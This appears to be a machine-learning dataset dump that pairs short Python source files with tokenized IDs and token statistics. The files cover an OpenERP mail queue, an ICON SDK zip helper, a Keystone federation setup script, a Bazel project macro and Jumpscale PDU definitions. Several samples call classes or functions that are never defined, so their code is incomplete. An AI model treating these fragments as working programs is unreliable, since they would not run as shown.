content stringlengths 1 1.04M | input_ids listlengths 1 774k | ratio_char_token float64 0.38 22.9 | token_count int64 1 774k |
|---|---|---|---|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
import base64
import logging
import re
from urllib import urlencode
from urlparse import urljoin
from openerp import tools
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.osv.orm import except_orm
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class mail_mail(osv.Model):
""" Model holding RFC2822 email messages to send. This model also provides
facilities to queue and send new email messages. """
_name = 'mail.mail'
_description = 'Outgoing Mails'
_inherits = {'mail.message': 'mail_message_id'}
_order = 'id desc'
_columns = {
'mail_message_id': fields.many2one('mail.message', 'Message', required=True, ondelete='cascade'),
'mail_server_id': fields.many2one('ir.mail_server', 'Outgoing mail server', readonly=1),
'state': fields.selection([
('outgoing', 'Outgoing'),
('sent', 'Sent'),
('received', 'Received'),
('exception', 'Delivery Failed'),
('cancel', 'Cancelled'),
], 'Status', readonly=True),
'auto_delete': fields.boolean('Auto Delete',
help="Permanently delete this email after sending it, to save space"),
'references': fields.text('References', help='Message references, such as identifiers of previous messages', readonly=1),
'email_from': fields.char('From', help='Message sender, taken from user preferences.'),
'email_to': fields.text('To', help='Message recipients'),
'email_cc': fields.char('Cc', help='Carbon copy message recipients'),
'reply_to': fields.char('Reply-To', help='Preferred response address for the message'),
'body_html': fields.text('Rich-text Contents', help="Rich-text/HTML message"),
# Auto-detected based on create() - if 'mail_message_id' was passed then this mail is a notification
# and during unlink() we will not cascade delete the parent and its attachments
'notification': fields.boolean('Is Notification')
}
_defaults = {
'state': 'outgoing',
'email_from': lambda self, cr, uid, ctx=None: self._get_default_from(cr, uid, ctx),
}
def process_email_queue(self, cr, uid, ids=None, context=None):
"""Send immediately queued messages, committing after each
message is sent - this is not transactional and should
not be called during another transaction!
:param list ids: optional list of emails ids to send. If passed
no search is performed, and these ids are used
instead.
:param dict context: if a 'filters' key is present in context,
this value will be used as an additional
filter to further restrict the outgoing
messages to send (by default all 'outgoing'
messages are sent).
"""
if context is None:
context = {}
if not ids:
filters = ['&', ('state', '=', 'outgoing'), ('type', '=', 'email')]
if 'filters' in context:
filters.extend(context['filters'])
ids = self.search(cr, uid, filters, context=context)
res = None
try:
# Force auto-commit - this is meant to be called by
# the scheduler, and we can't allow rolling back the status
# of previously sent emails!
res = self.send(cr, uid, ids, auto_commit=True, context=context)
except Exception:
_logger.exception("Failed processing mail queue")
return res
def _postprocess_sent_message(self, cr, uid, mail, context=None):
"""Perform any post-processing necessary after sending ``mail``
successfully, including deleting it completely along with its
attachment if the ``auto_delete`` flag of the mail was set.
Overridden by subclasses for extra post-processing behaviors.
:param browse_record mail: the mail that was just sent
:return: True
"""
if mail.auto_delete:
# done with SUPERUSER_ID to avoid giving large unlink access rights
self.unlink(cr, SUPERUSER_ID, [mail.id], context=context)
return True
def send_get_mail_subject(self, cr, uid, mail, force=False, partner=None, context=None):
""" If subject is void and record_name defined: '<Author> posted on <Resource>'
:param boolean force: force the subject replacement
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
if (force or not mail.subject) and mail.record_name:
return 'Re: %s' % (mail.record_name)
elif (force or not mail.subject) and mail.parent_id and mail.parent_id.subject:
return 'Re: %s' % (mail.parent_id.subject)
return mail.subject
def send_get_mail_body(self, cr, uid, mail, partner=None, context=None):
""" Return a specific ir_email body. The main purpose of this method
is to be inherited by Portal, to add a link for signing in, in
each notification email a partner receives.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
body = mail.body_html
# partner is a user, link to a related document (incentive to install portal)
if partner and partner.user_ids and mail.model and mail.res_id \
and self.check_access_rights(cr, partner.user_ids[0].id, 'read', raise_exception=False):
related_user = partner.user_ids[0]
try:
self.pool.get(mail.model).check_access_rule(cr, related_user.id, [mail.res_id], 'read', context=context)
base_url = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
# the parameters to encode for the query and fragment part of url
query = {'db': cr.dbname}
fragment = {
'login': related_user.login,
'model': mail.model,
'id': mail.res_id,
}
url = urljoin(base_url, "?%s#%s" % (urlencode(query), urlencode(fragment)))
text = _("""<p>Access this document <a href="%s">directly in OpenERP</a></p>""") % url
body = tools.append_content_to_html(body, ("<div><p>%s</p></div>" % text), plaintext=False)
except except_orm, e:
pass
return body
def send_get_mail_reply_to(self, cr, uid, mail, partner=None, context=None):
""" Return a specific ir_email reply_to.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
if mail.reply_to:
return mail.reply_to
email_reply_to = False
# if model and res_id: try to use ``message_get_reply_to`` that returns the document alias
if mail.model and mail.res_id and hasattr(self.pool.get(mail.model), 'message_get_reply_to'):
email_reply_to = self.pool.get(mail.model).message_get_reply_to(cr, uid, [mail.res_id], context=context)[0]
# no alias reply_to -> reply_to will be the email_from, only the email part
if not email_reply_to and mail.email_from:
emails = tools.email_split(mail.email_from)
if emails:
email_reply_to = emails[0]
# format 'Document name <email_address>'
if email_reply_to and mail.model and mail.res_id:
document_name = self.pool.get(mail.model).name_get(cr, SUPERUSER_ID, [mail.res_id], context=context)[0]
if document_name:
# sanitize document name
sanitized_doc_name = re.sub(r'[^\w+.]+', '-', document_name[1])
# generate reply to
email_reply_to = _('"Followers of %s" <%s>') % (sanitized_doc_name, email_reply_to)
return email_reply_to
def send_get_email_dict(self, cr, uid, mail, partner=None, context=None):
""" Return a dictionary for specific email values, depending on a
partner, or generic to the whole recipients given by mail.email_to.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
body = self.send_get_mail_body(cr, uid, mail, partner=partner, context=context)
subject = self.send_get_mail_subject(cr, uid, mail, partner=partner, context=context)
reply_to = self.send_get_mail_reply_to(cr, uid, mail, partner=partner, context=context)
body_alternative = tools.html2plaintext(body)
# generate email_to, heuristic:
# 1. if 'partner' is specified and there is a related document: Followers of 'Doc' <email>
# 2. if 'partner' is specified, but no related document: Partner Name <email>
# 3; fallback on mail.email_to that we split to have an email addresses list
if partner and mail.record_name:
sanitized_record_name = re.sub(r'[^\w+.]+', '-', mail.record_name)
email_to = [_('"Followers of %s" <%s>') % (sanitized_record_name, partner.email)]
elif partner:
email_to = ['%s <%s>' % (partner.name, partner.email)]
else:
email_to = tools.email_split(mail.email_to)
return {
'body': body,
'body_alternative': body_alternative,
'subject': subject,
'email_to': email_to,
'reply_to': reply_to,
}
def send(self, cr, uid, ids, auto_commit=False, recipient_ids=None, context=None):
""" Sends the selected emails immediately, ignoring their current
state (mails that have already been sent should not be passed
unless they should actually be re-sent).
Emails successfully delivered are marked as 'sent', and those
that fail to be deliver are marked as 'exception', and the
corresponding error mail is output in the server logs.
:param bool auto_commit: whether to force a commit of the mail status
after sending each mail (meant only for scheduler processing);
should never be True during normal transactions (default: False)
:param list recipient_ids: specific list of res.partner recipients.
If set, one email is sent to each partner. Its is possible to
tune the sent email through ``send_get_mail_body`` and ``send_get_mail_subject``.
If not specified, one email is sent to mail_mail.email_to.
:return: True
"""
ir_mail_server = self.pool.get('ir.mail_server')
for mail in self.browse(cr, uid, ids, context=context):
try:
# handle attachments
attachments = []
for attach in mail.attachment_ids:
attachments.append((attach.datas_fname, base64.b64decode(attach.datas)))
# specific behavior to customize the send email for notified partners
email_list = []
if recipient_ids:
partner_obj = self.pool.get('res.partner')
existing_recipient_ids = partner_obj.exists(cr, SUPERUSER_ID, recipient_ids, context=context)
for partner in partner_obj.browse(cr, SUPERUSER_ID, existing_recipient_ids, context=context):
email_list.append(self.send_get_email_dict(cr, uid, mail, partner=partner, context=context))
else:
email_list.append(self.send_get_email_dict(cr, uid, mail, context=context))
# build an RFC2822 email.message.Message object and send it without queuing
res = None
for email in email_list:
msg = ir_mail_server.build_email(
email_from = mail.email_from,
email_to = email.get('email_to'),
subject = email.get('subject'),
body = email.get('body'),
body_alternative = email.get('body_alternative'),
email_cc = tools.email_split(mail.email_cc),
reply_to = email.get('reply_to'),
attachments = attachments,
message_id = mail.message_id,
references = mail.references,
object_id = mail.res_id and ('%s-%s' % (mail.res_id, mail.model)),
subtype = 'html',
subtype_alternative = 'plain')
res = ir_mail_server.send_email(cr, uid, msg,
mail_server_id=mail.mail_server_id.id, context=context)
if res:
mail.write({'state': 'sent', 'message_id': res})
mail_sent = True
else:
mail.write({'state': 'exception'})
mail_sent = False
# /!\ can't use mail.state here, as mail.refresh() will cause an error
# see revid:odo@openerp.com-20120622152536-42b2s28lvdv3odyr in 6.1
if mail_sent:
self._postprocess_sent_message(cr, uid, mail, context=context)
except MemoryError:
# prevent catching transient MemoryErrors, bubble up to notify user or abort cron job
# instead of marking the mail as failed
raise
except Exception:
_logger.exception('failed sending mail.mail %s', mail.id)
mail.write({'state': 'exception'})
if auto_commit == True:
cr.commit()
return True
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
29113,
29113,
7804,
4242,
2235,
198,
2,
198,
2,
220,
220,
220,
4946,
1137,
47,
11,
4946,
8090,
8549,
28186,
198,
2,
220,
220,
220,
15069,
357,
34,
8,
3050,
12,
40838... | 2.317446 | 6,483 |
# -*- coding: utf-8 -*-
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from io import BytesIO
from os import path, walk
from zipfile import ZipFile, ZIP_DEFLATED
from iconsdk.exception import ZipException
def gen_deploy_data_content(_path: str) -> bytes:
"""Generate bytes of zip data of SCORE.
:param _path: Path of the directory to be zipped.
"""
if path.isdir(_path) is False and path.isfile(_path) is False:
raise ValueError(f"Invalid path {_path}")
try:
memory_zip = InMemoryZip()
memory_zip.zip_in_memory(_path)
except ZipException:
raise ZipException(f"Can't zip SCORE contents")
else:
return memory_zip.data
class InMemoryZip:
"""Class for compressing data in memory using zip and BytesIO."""
@property
def data(self) -> bytes:
"""Returns zip data
:return: zip data
"""
self._in_memory.seek(0)
return self._in_memory.read()
def zip_in_memory(self, _path: str):
"""Compress zip data (bytes) in memory.
:param _path: The path of the directory to be zipped.
"""
try:
# when it is a zip file
if path.isfile(_path):
zf = ZipFile(_path, 'r', ZIP_DEFLATED, False)
zf.testzip()
with open(_path, mode='rb') as fp:
fp.seek(0)
self._in_memory.seek(0)
self._in_memory.write(fp.read())
else:
# root path for figuring out directory of tests
tmp_root = None
with ZipFile(self._in_memory, 'a', ZIP_DEFLATED, False, compresslevel=9) as zf:
for root, folders, files in walk(_path):
if 'package.json' in files:
tmp_root = root
if tmp_root and root.replace(tmp_root,'') == '/tests':
continue
if root.find('__pycache__') != -1:
continue
if root.find('/.') != -1:
continue
for file in files:
if file.startswith('.'):
continue
full_path = path.join(root, file)
zf.write(full_path)
except ZipException:
raise ZipException
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
15069,
2864,
314,
10943,
5693,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
42... | 2.117898 | 1,408 |
a = list(range(10))
slice1 = slice(0, 3)
slice2 = slice(4, 8)
print(a[slice1])
print(a[slice2])
a[slice2] = ["@", "#", "$", "%"]
print(a)
del a[slice1]
print(a)
print(f"slice start: {slice1.start}")
print(f"slice stop: {slice1.stop}")
print(f"slice step: {slice1.step}")
c = slice(0, 100, 3)
s = "0as0ef0df0vd0ef0d"
for i in range(*c.indices(len(s))):
print(s[i], end='')
| [
64,
796,
1351,
7,
9521,
7,
940,
4008,
198,
48369,
16,
796,
16416,
7,
15,
11,
513,
8,
198,
48369,
17,
796,
16416,
7,
19,
11,
807,
8,
198,
4798,
7,
64,
58,
48369,
16,
12962,
198,
4798,
7,
64,
58,
48369,
17,
12962,
198,
198,
64... | 2.059459 | 185 |
#!/usr/bin/env python
import ConfigParser
import requests
import json
cp = ConfigParser.SafeConfigParser()
cp.read('/etc/keystone/keystone.conf')
token = cp.get('DEFAULT', 'admin_token')
baseurl = 'http://localhost:35357/v3/OS-FEDERATION'
headers = {
'X-Auth-Token': token,
'Content-Type': 'application/json',
}
with open('/opt/himlar/json/create-idp.json') as fh:
data = fh.read()
response = requests.put(baseurl + '/identity_providers/dataporten',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/identity_providers/dataporten',
headers=headers, data=data)
response.raise_for_status()
resp = requests.get('http://localhost:35357/v3/domains', headers=headers)
domains = resp.json()['domains']
domain_id = None
for domain in domains:
if domain['name'] == u'connect':
domain_id = domain['id']
if not domain_id:
raise Exception('Did not find domain "connect"')
with open('/opt/himlar/json/create-mapping.json') as fh:
data = fh.read()
data = data.replace('CONNECT_DOMAIN_ID', domain_id)
response = requests.put(baseurl + '/mappings/dataporten',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/mappings/dataporten',
headers=headers, data=data)
response.raise_for_status()
with open('/opt/himlar/json/create-protocol.json') as fh:
data = fh.read()
response = requests.put(baseurl + '/identity_providers/dataporten/protocols/oidc',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/identity_providers/dataporten/protocols/oidc',
headers=headers, data=data)
response.raise_for_status()
data = {
'group': {
'description': 'Gruppe for test med dataporten',
'domain_id': domain_id,
'name': 'dataporten_group',
}
}
response = requests.post('http://localhost:35357/v3/groups',
headers=headers, data=json.dumps(data))
if response.status_code not in (201, 409):
raise Exception('Could not create group')
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
11748,
17056,
46677,
198,
11748,
7007,
198,
11748,
33918,
198,
198,
13155,
796,
17056,
46677,
13,
31511,
16934,
46677,
3419,
198,
13155,
13,
961,
10786,
14,
14784,
14,
2539,
6440,
14,
25... | 2.323202 | 987 |
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from extensions.front.tf.concat_ext import ConcatFrontExtractor
from unit_tests.utils.extractors import PB, BaseExtractorsTestingClass
| [
2,
15069,
357,
34,
8,
2864,
12,
1238,
2481,
8180,
10501,
198,
2,
30628,
55,
12,
34156,
12,
33234,
7483,
25,
24843,
12,
17,
13,
15,
198,
198,
6738,
18366,
13,
8534,
13,
27110,
13,
1102,
9246,
62,
2302,
1330,
1482,
9246,
25886,
1162... | 3.318182 | 66 |
"""Defines a project macro used in every TokTok sub-project.
It checks constraints such as the use of the correct license and the presence
and correctness of the license text.
"""
_haskell_travis = rule(
attrs = {
"package": attr.string(mandatory = True),
"_template": attr.label(
default = Label("//tools/project:haskell_travis.yml.in"),
allow_single_file = True,
),
},
outputs = {"source_file": ".travis-expected.yml"},
implementation = _haskell_travis_impl,
)
def project(license = "gpl3", standard_travis = False):
"""Adds some checks to make sure the project is uniform."""
native.sh_test(
name = "license_test",
size = "small",
srcs = ["//tools/project:diff_test.sh"],
args = [
"$(location LICENSE)",
"$(location //tools:LICENSE.%s)" % license,
],
data = [
"LICENSE",
"//tools:LICENSE.%s" % license,
],
)
native.sh_test(
name = "readme_test",
size = "small",
srcs = ["//tools/project:readme_test.sh"],
args = ["$(location README.md)"],
data = ["README.md"],
)
native.sh_test(
name = "settings_test",
size = "small",
srcs = ["//tools/project:settings_test.sh"],
args = [
"$(location .github/settings.yml)",
# qTox is an exception. Maybe we should rename the submodule?
"qTox" if native.package_name() == "qtox" else native.package_name().replace("_", "-"),
],
data = [".github/settings.yml"],
)
if (native.package_name().startswith("hs-") and
any([f for f in native.glob(["*"]) if f.endswith(".cabal")])):
_haskell_project(
standard_travis = standard_travis,
)
| [
37811,
7469,
1127,
257,
1628,
15021,
973,
287,
790,
9453,
19042,
850,
12,
16302,
13,
198,
198,
1026,
8794,
17778,
884,
355,
262,
779,
286,
262,
3376,
5964,
290,
262,
4931,
198,
392,
29409,
286,
262,
5964,
2420,
13,
198,
37811,
198,
... | 2.194012 | 835 |
"""the simple baseline for autograph"""
import numpy as np
import pandas as pd
import torch
import torch.nn.functional as F
from torch.nn import Linear
from torch_geometric.nn import GCNConv, JumpingKnowledge
from torch_geometric.data import Data
from torch_geometric.nn import Node2Vec
from torch.utils.data import DataLoader
import networkx as nx
import random
from collections import Counter
from utils import normalize_features
import scipy.sparse as sp
from appnp import APPNPTrainer
from daydayup_model import GCNTrainer, TAGTrainer, XGBTrainer
from scipy import stats
from sklearn import preprocessing
import warnings
warnings.filterwarnings("ignore")
from daydayup_private_features import dayday_feature, dayday_feature_old
fix_seed(1234)
| [
37811,
1169,
2829,
14805,
329,
1960,
2384,
37811,
201,
198,
201,
198,
11748,
299,
32152,
355,
45941,
201,
198,
11748,
19798,
292,
355,
279,
67,
201,
198,
201,
198,
11748,
28034,
201,
198,
11748,
28034,
13,
20471,
13,
45124,
355,
376,
... | 3.007519 | 266 |
from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
| [
6738,
1366,
62,
320,
1819,
1010,
13,
27604,
13,
9503,
1746,
1330,
7308,
55,
8439,
11522,
17818,
42350,
34,
21370,
3546,
26634,
628
] | 3.608696 | 23 |
# -*- coding: utf-8 -*-
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#
# Copyright (c) 2019 Image Processing Research Group of University Federico II of Naples ('GRIP-UNINA').
# All rights reserved.
# This work should only be used for nonprofit purposes.
#
# By downloading and/or using any of these files, you implicitly agree to all the
# terms of the license, as specified in the document LICENSE.md
# (included in this package) and online at
# http://www.grip.unina.it/download/LICENSE_OPEN.txt
#
import numpy as np
from skimage.util import view_as_blocks,view_as_windows
from math import floor
from scipy.interpolate import interp2d
from scipy.io import savemat
################################################
import matplotlib.pyplot as plt
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
201,
198,
2,
4064,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
201,
198,
2,
201,
198,
2,
15069,
... | 3.184314 | 255 |
# pylint: disable=W0201
from Jumpscale import j
JSBASE = j.baseclasses.object
# Variables
functions = {}
func = Functions()
functions[1] = func
func.guid = 1
func.name = "GeneralModuleStatus"
func.description = "General status of a module"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[2] = func
func.guid = 2
func.name = "SpecificModuleStatus"
func.description = ""
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[3] = func
func.guid = 3
func.name = "CurrentTime"
func.description = "Unix timestamp of the current time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_TIMESTAMP"
func.valDef.size = 4
func.valDef.unit = "UNIX"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[4] = func
func.guid = 4
func.name = "Voltage"
func.description = "True RMS Voltage"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5] = func
func.guid = 5
func.name = "Frequency"
func.description = "Frequency"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "Hz"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[6] = func
func.guid = 6
func.name = "Current"
func.description = "Current true RMS"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[7] = func
func.guid = 7
func.name = "Power"
func.description = "Real Power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[8] = func
func.guid = 8
func.name = "StatePortCur"
func.description = "current port state"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[9] = func
func.guid = 9
func.name = "ActiveEnergy"
func.description = "Active Energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10] = func
func.guid = 10
func.name = "ApparentEnergy"
func.description = "Apparent Energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[11] = func
func.guid = 11
func.name = "Temperature"
func.description = "Temperature"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[12] = func
func.guid = 12
func.name = "Humidity"
func.description = "Humidity"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[13] = func
func.guid = 13
func.name = "FanSpeed"
func.description = "Fanspeed in Rounds per minute"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "rpm"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5000] = func
func.guid = 5000
func.name = "MaxCurrent"
func.description = "Maximum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5001] = func
func.guid = 5001
func.name = "MaxPower"
func.description = "Maximum port power occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5002] = func
func.guid = 5002
func.name = "MaxTotalCurrent"
func.description = "Maximum total current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5003] = func
func.guid = 5003
func.name = "MaxTotalPower"
func.description = "Maximum total power occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 8
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[5004] = func
func.guid = 5004
func.name = "MaxVoltage"
func.description = "Maximum voltage occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5005] = func
func.guid = 5005
func.name = "MinVoltage"
func.description = "Minimum voltage occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5006] = func
func.guid = 5006
func.name = "MinTemperature"
func.description = "Minimum temperature occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[5007] = func
func.guid = 5007
func.name = "MaxTemperature"
func.description = "Maximum temperature occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[5008] = func
func.guid = 5008
func.name = "MinHumidity"
func.description = "Minimum humidity occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5009] = func
func.guid = 5009
func.name = "MaxHumidity"
func.description = "Maximum humidity occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10000] = func
func.guid = 10000
func.name = "Address"
func.description = "Identification of the module"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10001] = func
func.guid = 10001
func.name = "ModuleName"
func.description = "Module name"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10002] = func
func.guid = 10002
func.name = "FirmwareVersion"
func.description = "Firmware version"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_VERSION"
func.valDef.size = 4
func = Functions()
functions[10003] = func
func.guid = 10003
func.name = "HardwareVersion"
func.description = "Hardware version"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_VERSION"
func.valDef.size = 4
func = Functions()
functions[10004] = func
func.guid = 10004
func.name = "FirmwareID"
func.description = "Identification of the firmware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 8
func = Functions()
functions[10005] = func
func.guid = 10005
func.name = "HardwareID"
func.description = "Identification of the hardware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 8
func = Functions()
functions[10006] = func
func.guid = 10006
func.name = "RackName"
func.description = "Rack Name"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10007] = func
func.guid = 10007
func.name = "RackPosition"
func.description = "Position of the Energy Switch in the rack"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10008] = func
func.guid = 10008
func.name = "AdminLogin"
func.description = "Admin Login"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10009] = func
func.guid = 10009
func.name = "AdminPassword"
func.description = "Admin Password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10010] = func
func.guid = 10010
func.name = "TemperatureUnitSelector"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10011] = func
func.guid = 10011
func.name = "IPAddress"
func.description = "IP-address"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10012] = func
func.guid = 10012
func.name = "SubNetMask"
func.description = "Subnetmask"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SUBNETMASK"
func.valDef.size = 4
func = Functions()
functions[10013] = func
func.guid = 10013
func.name = "StdGateWay"
func.description = "Standard gateway IP"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
